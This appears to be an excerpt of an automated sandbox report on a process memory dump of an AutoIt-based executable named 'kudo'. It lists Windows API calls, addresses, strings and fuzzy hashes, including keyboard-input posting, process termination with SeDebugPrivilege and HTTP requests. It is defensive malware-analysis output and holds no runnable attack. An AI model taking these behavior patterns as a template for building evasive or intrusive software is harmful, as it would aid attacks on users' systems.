                                                      • Opcode Fuzzy Hash: 860e1113e6603673840a4c2b644293898a69d13b92cd9859c8af42cb50e514ec
                                                      • Instruction Fuzzy Hash: E1112C3A288327F9FA212628EC06DE73B9CFB15721F200026FE20E41D2FF6968556655
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 008788D7
                                                      • CoInitialize.OLE32(00000000), ref: 00878904
                                                      • CoUninitialize.OLE32 ref: 0087890E
                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00878A0E
                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00878B3B
                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00892C0C), ref: 00878B6F
                                                      • CoGetObject.OLE32(?,00000000,00892C0C,?), ref: 00878B92
                                                      • SetErrorMode.KERNEL32(00000000), ref: 00878BA5
                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00878C25
                                                      • VariantClear.OLEAUT32(?), ref: 00878C35
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                      • String ID:
                                                      • API String ID: 2395222682-0
                                                      • Opcode ID: 75ff5a60db04185cbdd7589b51d775a52edf46c66852cde8e3c25913e558772e
                                                      • Instruction ID: 88a7e0c925591abad47e7a1147383c0dbc64cb559e3b47d824966f62b7102d88
                                                      • Opcode Fuzzy Hash: 75ff5a60db04185cbdd7589b51d775a52edf46c66852cde8e3c25913e558772e
                                                      • Instruction Fuzzy Hash: CCC103B1604305AFC700DF68C88892AB7E9FF89358F00896DF59ADB251DB71ED05CB52
                                                      APIs
                                                      • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00867A6C
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ArraySafeVartype
                                                      • String ID:
                                                      • API String ID: 1725837607-0
                                                      • Opcode ID: debb71154980d07e40f20dc2e7307c4d827e2d3acdf815b34392fe4188035e49
                                                      • Instruction ID: 7f9eebb2eb27108c69c1d02f2750bb8dd1ea9ef46e01ed282a0f8aa33351f608
                                                      • Opcode Fuzzy Hash: debb71154980d07e40f20dc2e7307c4d827e2d3acdf815b34392fe4188035e49
                                                      • Instruction Fuzzy Hash: B3B1AF7190421A9FDB10DFA8D885BBEB7F4FF09329F224429E641EB291D734A941CBD1
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32(?,?,?,?,?,00860268,?,00000001), ref: 008611F0
                                                      • GetForegroundWindow.USER32 ref: 00861204
                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0086120B
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0086121A
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0086122C
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00861245
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00861257
                                                      • AttachThreadInput.USER32(00000000,00000000), ref: 0086129C
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 008612B1
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 008612BC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                      • String ID:
                                                      • API String ID: 2156557900-0
                                                      • Opcode ID: ec1810bc4795bd5b4b533a4cb0d6aa7263f70cc48c536c5f65f6fb0c9a4d7798
                                                      • Instruction ID: 94913e8665c57bd0c1b718785faddd381c8c8c8f749082909420b160769076a3
                                                      • Opcode Fuzzy Hash: ec1810bc4795bd5b4b533a4cb0d6aa7263f70cc48c536c5f65f6fb0c9a4d7798
                                                      • Instruction Fuzzy Hash: 8C31AE75610208ABDF10DF54FC58F6937BAFF54315F154229F901C72A2EB74AD508B50
                                                      APIs
                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0080FAA6
                                                      • OleUninitialize.OLE32(?,00000000), ref: 0080FB45
                                                      • UnregisterHotKey.USER32(?), ref: 0080FC9C
                                                      • DestroyWindow.USER32(?), ref: 008445D6
                                                      • FreeLibrary.KERNEL32(?), ref: 0084463B
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00844668
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                      • String ID: close all
                                                      • API String ID: 469580280-3243417748
                                                      • Opcode ID: 64cb4a2f48bc246a076d4a7bfa55849c48f7152434dfecb0e763d8b46eabb4d1
                                                      • Instruction ID: 97f13684d663195bb9d0d620bdda0e8fd70fe302d364f9d354957617b921e685
                                                      • Opcode Fuzzy Hash: 64cb4a2f48bc246a076d4a7bfa55849c48f7152434dfecb0e763d8b46eabb4d1
                                                      • Instruction Fuzzy Hash: 38A17C303012268FDB68EF18C895B69F764FF15714F1142ADE90AEB6A2DB30AC56CF51
                                                      APIs
                                                      • EnumChildWindows.USER32(?,0085A439), ref: 0085A377
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ChildEnumWindows
                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                      • API String ID: 3555792229-1603158881
                                                      • Opcode ID: 84b2da52cfd04f086e86299e81b292152afd29356db1daf36b62ef1c8d11355e
                                                      • Instruction ID: 78cbaef5d5192757c552b90a66ffbd53bb3540ac30e7c9aa77a290a29c74f6ae
                                                      • Opcode Fuzzy Hash: 84b2da52cfd04f086e86299e81b292152afd29356db1daf36b62ef1c8d11355e
                                                      • Instruction Fuzzy Hash: BF919431500615AACB0CDFA4C8D2BEDFB64FF04305F548229ED5AE7291DB31699DCB92
                                                      APIs
                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00802EAE
                                                        • Part of subcall function 00801DB3: GetClientRect.USER32(?,?), ref: 00801DDC
                                                        • Part of subcall function 00801DB3: GetWindowRect.USER32(?,?), ref: 00801E1D
                                                        • Part of subcall function 00801DB3: ScreenToClient.USER32(?,?), ref: 00801E45
                                                      • GetDC.USER32 ref: 0083CD32
                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0083CD45
                                                      • SelectObject.GDI32(00000000,00000000), ref: 0083CD53
                                                      • SelectObject.GDI32(00000000,00000000), ref: 0083CD68
                                                      • ReleaseDC.USER32(?,00000000), ref: 0083CD70
                                                      • MoveWindow.USER32(?,?,?,?,?,?), ref: 0083CDFB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                      • String ID: U
                                                      • API String ID: 4009187628-3372436214
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00871A50
                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00871A7C
                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00871ABE
                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00871AD3
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00871AE0
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00871B10
                                                      • InternetCloseHandle.WININET(00000000), ref: 00871B57
                                                        • Part of subcall function 00872483: GetLastError.KERNEL32(?,?,00871817,00000000,00000000,00000001), ref: 00872498
                                                        • Part of subcall function 00872483: SetEvent.KERNEL32(?,?,00871817,00000000,00000000,00000001), ref: 008724AD
                                                      Similarity
                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                      • String ID:
                                                      • API String ID: 2603140658-3916222277
                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00803074
                                                      • RegisterClassExW.USER32(00000030), ref: 0080309E
                                                      • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008030AF
                                                      • LoadIconW.USER32(000000A9), ref: 008030F2
                                                      Similarity
                                                      • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 975902462-1005189915
                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00803074
                                                      • RegisterClassExW.USER32(00000030), ref: 0080309E
                                                      • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008030AF
                                                      • LoadIconW.USER32(000000A9), ref: 008030F2
                                                      Similarity
                                                      • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 975902462-1005189915
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0088F910), ref: 00878D28
                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0088F910), ref: 00878D5C
                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00878ED6
                                                      • SysFreeString.OLEAUT32(?), ref: 00878F00
                                                      Similarity
                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                      • String ID:
                                                      • API String ID: 560350794-0
                                                      APIs
                                                      • _memset.LIBCMT ref: 0087F6B5
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0087F848
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0087F86C
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0087F8AC
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0087F8CE
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0087FA4A
                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0087FA7C
                                                      • CloseHandle.KERNEL32(?), ref: 0087FAAB
                                                      • CloseHandle.KERNEL32(?), ref: 0087FB22
                                                      Similarity
                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                      • String ID:
                                                      • API String ID: 4090791747-0
                                                      APIs
                                                        • Part of subcall function 00801B41: InvalidateRect.USER32(?,00000000,00000001), ref: 00801B9A
                                                      • DestroyWindow.USER32(?), ref: 008020D3
                                                      • KillTimer.USER32(-00000001,?), ref: 0080216E
                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 0083BCA6
                                                      • DeleteObject.GDI32(00000000), ref: 0083BD1C
                                                      Similarity
                                                      • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                      • String ID:
                                                      • API String ID: 2402799130-0
                                                      APIs
                                                        • Part of subcall function 0086466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00863697,?), ref: 0086468B
                                                        • Part of subcall function 0086466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00863697,?), ref: 008646A4
                                                        • Part of subcall function 00864A31: GetFileAttributesW.KERNEL32(?,0086370B), ref: 00864A32
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00864D40
                                                      • _wcscmp.LIBCMT ref: 00864D5A
                                                      • MoveFileW.KERNEL32(?,?), ref: 00864D75
                                                      Similarity
                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                      • String ID:
                                                      • API String ID: 793581249-0
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 008886FF
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID:
                                                      • API String ID: 634782764-0
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0083C2F7
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0083C319
                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0083C331
                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0083C34F
                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0083C370
                                                      • DestroyCursor.USER32(00000000), ref: 0083C37F
                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0083C39C
                                                      • DestroyCursor.USER32(?), ref: 0083C3AB
                                                        • Part of subcall function 0088A4AF: DeleteObject.GDI32(00000000), ref: 0088A4E8
                                                      Similarity
                                                      • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                                                      • String ID:
                                                      • API String ID: 2975913752-0
                                                      • Opcode ID: 4065be1e97f5fd6b1b8820cce3e4d8f3f14238eec0ff7f45b7dc6f3ca342c8ad
                                                      • Instruction ID: b771ce93ff4e3c74100d9dd96cf5670fb4d073b554f42d864cf3980a789fad97
                                                      • Opcode Fuzzy Hash: 4065be1e97f5fd6b1b8820cce3e4d8f3f14238eec0ff7f45b7dc6f3ca342c8ad
                                                      • Instruction Fuzzy Hash: DB512970610209EFDB64DF68CC59FAA7BB5FB58320F104529F946E72E0D7B0A990DB90
                                                      APIs
                                                        • Part of subcall function 0085A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0085A84C
                                                        • Part of subcall function 0085A82C: GetCurrentThreadId.KERNEL32(00000000,?,00859683,?,00000001), ref: 0085A853
                                                        • Part of subcall function 0085A82C: AttachThreadInput.USER32(00000000,?,00859683), ref: 0085A85A
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0085968E
                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008596AB
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 008596AE
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 008596B7
                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 008596D5
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008596D8
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 008596E1
                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 008596F8
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008596FB
                                                      Similarity
                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                      • String ID:
                                                      • API String ID: 2014098862-0
                                                      • Opcode ID: 54e746c9a0388225e78e42b90c28a44cd57cdfd6dbd436a795aa8fe7e26eca82
                                                      • Instruction ID: 560a666a6af6d6efb5327a8a48e5cdda5256998ce49bdeb11b68c29a241c66c6
                                                      • Opcode Fuzzy Hash: 54e746c9a0388225e78e42b90c28a44cd57cdfd6dbd436a795aa8fe7e26eca82
                                                      • Instruction Fuzzy Hash: 0B11CEB1A10218BEFA106B689C89F6A3A2DFB4C752F100525F744EB0A1C9F25C10DBA4
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0085853C,00000B00,?,?), ref: 0085892A
                                                      • RtlAllocateHeap.NTDLL(00000000,?,0085853C), ref: 00858931
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0085853C,00000B00,?,?), ref: 00858946
                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,0085853C,00000B00,?,?), ref: 0085894E
                                                      • DuplicateHandle.KERNEL32(00000000,?,0085853C,00000B00,?,?), ref: 00858951
                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0085853C,00000B00,?,?), ref: 00858961
                                                      • GetCurrentProcess.KERNEL32(0085853C,00000000,?,0085853C,00000B00,?,?), ref: 00858969
                                                      • DuplicateHandle.KERNEL32(00000000,?,0085853C,00000B00,?,?), ref: 0085896C
                                                      • CreateThread.KERNEL32(00000000,00000000,00858992,00000000,00000000,00000000), ref: 00858986
                                                      Similarity
                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                                      • String ID:
                                                      • API String ID: 1422014791-0
                                                      • Opcode ID: 044bba99d684d3f3ed3bb26fb1c2552249d06fdc1f6aaef271cdc4bddad81979
                                                      • Instruction ID: d7bafcd81ea3e68574c7d8842ef06bf9d5c908ab31372e89d7f910a83d806b02
                                                      • Opcode Fuzzy Hash: 044bba99d684d3f3ed3bb26fb1c2552249d06fdc1f6aaef271cdc4bddad81979
                                                      • Instruction Fuzzy Hash: E601AC75240304FFE611ABA9DC8DF677B6CFB89711F404421FB05DB191CA74A8108B20
                                                      APIs
                                                      Similarity
                                                      • API ID: Variant$ClearInit$_memset
                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                      • API String ID: 2862541840-625585964
                                                      • Opcode ID: 4f5b75c55a0f537343812f83045185c08a6ae60919a4422a647fc972c1535704
                                                      • Instruction ID: bec37376e6e3795b16e76504e989bcc43928956bba14f4dcb69b93c7943d61a9
                                                      • Opcode Fuzzy Hash: 4f5b75c55a0f537343812f83045185c08a6ae60919a4422a647fc972c1535704
                                                      • Instruction Fuzzy Hash: 5C918A71A00219ABDF20DFA5C888FAEBBB8FF45714F108159F559EB289D770D944CBA0
                                                      APIs
                                                        • Part of subcall function 0085710A: CLSIDFromProgID.OLE32 ref: 00857127
                                                        • Part of subcall function 0085710A: ProgIDFromCLSID.OLE32(?,00000000), ref: 00857142
                                                        • Part of subcall function 0085710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857044,80070057,?,?), ref: 00857150
                                                        • Part of subcall function 0085710A: CoTaskMemFree.OLE32(00000000), ref: 00857160
                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00879806
                                                      • _memset.LIBCMT ref: 00879813
                                                      • _memset.LIBCMT ref: 00879956
                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00879982
                                                      • CoTaskMemFree.OLE32(?), ref: 0087998D
                                                      Strings
                                                      • NULL Pointer assignment, xrefs: 008799DB
                                                      Similarity
                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                      • String ID: NULL Pointer assignment
                                                      • API String ID: 1300414916-2785691316
                                                      • Opcode ID: 4115f2a7ea5d7fcf676e4f53be889a45a443fee932c982690ffae20068a5831c
                                                      • Instruction ID: 8341f7367009b2c6d2b6e690e72dfa08e04d3a8733e819832963299f9a3c8f46
                                                      • Opcode Fuzzy Hash: 4115f2a7ea5d7fcf676e4f53be889a45a443fee932c982690ffae20068a5831c
                                                      • Instruction Fuzzy Hash: 0B91F671D00229EBDB10DFA9DC45ADEBBB9FF08310F108169E519E7291EB719A44CFA1
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00886E24
                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00886E38
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00886E52
                                                      • _wcscat.LIBCMT ref: 00886EAD
                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00886EC4
                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00886EF2
                                                      Similarity
                                                      • API ID: MessageSend$Window_wcscat
                                                      • String ID: SysListView32
                                                      • API String ID: 307300125-78025650
                                                      • Opcode ID: 202ecb9ab9681ed51818631790a656d2f118467d66ac66e9c27ff9082f02ec2e
                                                      • Instruction ID: 00d5950fbb8bfb295f71b7a87d15da12e1622a41103c975cddcd66d961af68e1
                                                      • Opcode Fuzzy Hash: 202ecb9ab9681ed51818631790a656d2f118467d66ac66e9c27ff9082f02ec2e
                                                      • Instruction Fuzzy Hash: 87419471A00348ABDF21EF68CC85BEE77A8FF08350F10056AF694D7292E6729D94CB50
                                                      APIs
                                                        • Part of subcall function 00863C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00863C7A
                                                        • Part of subcall function 00863C55: Process32FirstW.KERNEL32(00000000,?), ref: 00863C88
                                                        • Part of subcall function 00863C55: CloseHandle.KERNEL32(00000000), ref: 00863D52
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0087E9A4
                                                      • GetLastError.KERNEL32 ref: 0087E9B7
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0087E9E6
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0087EA63
                                                      • GetLastError.KERNEL32(00000000), ref: 0087EA6E
                                                      • CloseHandle.KERNEL32(00000000), ref: 0087EAA3
                                                      Similarity
                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 2533919879-2896544425
                                                      • Opcode ID: f9d977896a22cc74408963a6915b6b4a5add0a6b91563ef8ddc6abb808949e66
                                                      • Instruction ID: 31780fb804d12a5b1c32d8ad4df129beb093b8b8fa72b25f90b2ea19fa0407c8
                                                      • Opcode Fuzzy Hash: f9d977896a22cc74408963a6915b6b4a5add0a6b91563ef8ddc6abb808949e66
                                                      • Instruction Fuzzy Hash: 2D4178712002009FDB11EF28CC95B69BBA5FF58314F048468FA4ADB3D2DB74E848CB96
                                                      APIs
                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00863033
                                                      Similarity
                                                      • API ID: IconLoad
                                                      • String ID: blank$info$question$stop$warning
                                                      • API String ID: 2457776203-404129466
                                                      • Opcode ID: 3b595e4bd499934d537b70ddc0f5aa2d3b666265903d9d21defbd9d2fa6511bd
                                                      • Instruction ID: b273d4f6992c65c0b9d072b92d7118346c7e3451188125b5f2f6a725a13087b6
                                                      • Opcode Fuzzy Hash: 3b595e4bd499934d537b70ddc0f5aa2d3b666265903d9d21defbd9d2fa6511bd
                                                      • Instruction Fuzzy Hash: A9112B35348B96BEE7259B58EC42CAF7B9CFF15324B21002AF900E62C2DF745F4456A6
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00864312
                                                      • LoadStringW.USER32(00000000), ref: 00864319
                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0086432F
                                                      • LoadStringW.USER32(00000000), ref: 00864336
                                                      • _wprintf.LIBCMT ref: 0086435C
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0086437A
                                                      Strings
                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00864357
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                      • API String ID: 3648134473-3128320259
                                                      • Opcode ID: 6e8c23adfc50d0343af94d1b70550f043971774fe1b0b7888d3fbdf89787bb03
                                                      • Instruction ID: 004cbed56e4d772cb854a97dad913f82c9c3f40a40c0a297914dd558b4c3e9fc
                                                      • Opcode Fuzzy Hash: 6e8c23adfc50d0343af94d1b70550f043971774fe1b0b7888d3fbdf89787bb03
                                                      • Instruction Fuzzy Hash: 250162F6900208BFE711E7A4DD89EFA776CFB08301F0005A1B745E6152EA745E854B71
                                                      APIs
                                                      • ShowWindow.USER32(FFFFFFFF,?), ref: 00802ACF
                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00802B17
                                                      • ShowWindow.USER32(FFFFFFFF,00000006), ref: 0083C21A
                                                      • ShowWindow.USER32(FFFFFFFF,?), ref: 0083C286
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 008670DD
                                                        • Part of subcall function 00820DB6: std::exception::exception.LIBCMT ref: 00820DEC
                                                        • Part of subcall function 00820DB6: __CxxThrowException@8.LIBCMT ref: 00820E01
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00867114
                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 00867130
                                                      • _memmove.LIBCMT ref: 0086717E
                                                      • _memmove.LIBCMT ref: 0086719B
                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 008671AA
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008671BF
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 008671DE
                                                      Similarity
                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                      • String ID:
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 008861EB
                                                      • GetDC.USER32(00000000), ref: 008861F3
                                                      • GetDeviceCaps.GDI32(00000000,0000005A,?,?,0088902A,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 008861FE
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0088620A
                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00886246
                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00886257
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00886291
                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 008862B1
                                                      Similarity
                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                      • String ID:
                                                      APIs
                                                      • IsWindow.USER32(00A12418), ref: 0088B3EB
                                                      • IsWindowEnabled.USER32(00A12418), ref: 0088B3F7
                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0088B4DB
                                                      • SendMessageW.USER32(00A12418,000000B0,?,?), ref: 0088B512
                                                      • IsDlgButtonChecked.USER32(?,?), ref: 0088B54F
                                                      • GetWindowLongW.USER32(00A12418,000000EC), ref: 0088B571
                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0088B589
                                                      Similarity
                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                      • String ID:
                                                      APIs
                                                      • _memset.LIBCMT ref: 0087F448
                                                      • _memset.LIBCMT ref: 0087F511
                                                      • ShellExecuteExW.SHELL32(?), ref: 0087F556
                                                        • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                        • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                        • Part of subcall function 0081FC86: _wcscpy.LIBCMT ref: 0081FCA9
                                                      • GetProcessId.KERNEL32(00000000), ref: 0087F5CD
                                                      • CloseHandle.KERNEL32(00000000), ref: 0087F5FC
                                                      Similarity
                                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                      • String ID: @
                                                      APIs
                                                      • GetParent.USER32(?), ref: 00860F8C
                                                      • GetKeyboardState.USER32(?), ref: 00860FA1
                                                      • SetKeyboardState.USER32(?), ref: 00861002
                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00861030
                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0086104F
                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00861095
                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008610B8
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      APIs
                                                      • GetParent.USER32(00000000), ref: 00860DA5
                                                      • GetKeyboardState.USER32(?), ref: 00860DBA
                                                      • SetKeyboardState.USER32(?), ref: 00860E1B
                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00860E47
